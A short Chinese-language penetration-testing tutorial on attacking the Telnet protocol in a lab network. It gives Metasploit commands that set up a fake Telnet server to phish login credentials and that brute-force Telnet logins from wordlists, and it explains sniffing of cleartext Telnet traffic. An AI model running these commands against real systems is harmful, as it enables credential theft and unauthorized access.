Telnet是一种默认不加密的不安全协议,可以通过它连接到本地网络中的其他系统。
Telnet远程登录
telnet 192.168.0.124
获取Telnet服务版本
nmap -sV -p23 <ip>
MITM:远程登录欺骗
通过metasploit的 auxiliary/server/capture/telnet模块在本机上设置一个虚假的telnet服务,通过钓鱼使其登录此telnet服务,一旦其尝试登录此虚假的telnet服务,我们就可以获取到他的登录凭证。这种和钓鱼有异曲同工之妙
use auxiliary/server/capture/telnet
set srvhost 192.168.0.109
set banner Hello World ##登录telnet服务是的提示
exploit
我们模拟受害者使用正确的凭证登录
受害者登录错误,但我们却获取到了他的登录凭证
暴力破解登录凭证
use auxiliary/scanner/telnet/telnet_login
msf auxiliary(telnet_login) > set rhosts 192.168.0.124
msf auxiliary(telnet_login) > set user_file /root/user.txt
msf auxiliary(telnet_login) > set pass_file /root/pass.txt
msf auxiliary(telnet_login) > set stop_on_success true
msf auxiliary(telnet_login) > exploit
嗅探Telnet凭证
默认情况下,telnet不会加密所有数据,因此若是攻击者具有telnet连接的两台机器的网络访问权限,他就可以通过中断源和目标之间的数据包,并获取身份验证和数据的详细信息